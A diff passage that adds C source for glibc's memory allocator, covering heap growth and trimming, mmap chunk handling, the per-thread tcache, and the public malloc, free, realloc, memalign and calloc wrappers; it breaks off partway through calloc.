+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t mem = (uintptr_t) chunk2mem (p);
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+
+  uintptr_t block = (uintptr_t) p - offset;
+  uintptr_t mem = (uintptr_t) chunk2mem(p);
+  size_t total_size = offset + size;
+  if (__glibc_unlikely ((block | total_size) & (pagesize - 1)) != 0
+      || __glibc_unlikely (!powerof2 (mem & (pagesize - 1))))
+    malloc_printerr("mremap_chunk(): invalid pointer");
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (total_size == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) block, total_size, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+  /* This field exists to detect double frees.  */
+  struct tcache_perthread_struct *key;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time), this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  uint16_t counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+
+  /* Mark this chunk as "in the tcache" so the test in _int_free will
+     detect a double free.  */
+  e->key = tcache;
+
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  e->key = NULL;
+  return (void *) e;
+}
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  _Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
+                  "PTRDIFF_MAX is not more than half of SIZE_MAX");
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  if (!checked_request2size (bytes, &tbytes))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      && tcache
+      && tcache->counts[tc_idx] > 0)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes;
+  /* ALIGN_UP with overflow check.  */
+  if (__glibc_unlikely (__builtin_add_overflow (bytes,
+						pagesize - 1,
+						&rounded_bytes)))
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+  rounded_bytes = rounded_bytes & -(pagesize - 1);
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+  ptrdiff_t bytes;
+
+  if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
+    {
+       __set_errno (ENOMEM);
+       return NULL;
+    }
+  sz = bytes;
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
